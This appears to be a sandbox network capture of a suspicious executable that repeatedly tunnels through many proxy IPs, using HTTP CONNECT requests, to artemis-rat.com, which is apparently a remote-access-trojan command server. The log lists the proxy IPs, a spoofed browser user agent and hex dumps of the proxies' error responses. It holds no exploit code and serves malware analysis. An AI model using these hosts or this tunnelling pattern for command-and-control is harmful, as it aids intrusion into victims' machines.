                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1698192.168.2.554625111.90.150.10910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.675213099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1699192.168.2.55051592.205.107.159572383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.675664902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.717590094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.811321974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.892803907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1700192.168.2.554759104.19.106.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.675863028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.830290079 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1701192.168.2.55403094.23.220.136437513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.676702976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.717497110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.811307907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.892788887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1702192.168.2.554763104.20.178.166803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.676732063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.831700087 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1703192.168.2.55463236.67.168.11780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.678807020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.056024075 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1704192.168.2.554569103.153.232.4180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.680870056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.081722021 CET19INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:49.274466038 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:50.480228901 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:52.873970032 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:57.682579994 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:07.311153889 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:26.551217079 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:05.031532049 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
                                                                                                                                                                                                                                                            Mar 11, 2024 03:34:21.911609888 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:29:25 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1705192.168.2.550585162.240.72.139374453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.683517933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702033997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1706192.168.2.55478445.12.31.104803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.686650038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.841113091 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1707192.168.2.55466489.42.166.16380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.687704086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405157089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.424112082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.026057005 CET203INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 1066
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Thu, 07 Mar 2024 15:57:46 GMT
                                                                                                                                                                                                                                                            Expires: Thu, 07 Mar 2024 15:57:46 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1708192.168.2.554785104.24.193.186803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.687967062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.842863083 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1709192.168.2.553296162.214.163.137505093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.689506054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1710192.168.2.5549134.182.9.1084433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.690112114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1711192.168.2.5549174.182.9.1084433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.691692114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1712192.168.2.5549184.182.9.1084433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.692955971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1713192.168.2.55456543.231.22.228803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.695102930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.110755920 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1714192.168.2.554792104.19.85.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.695195913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.849829912 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
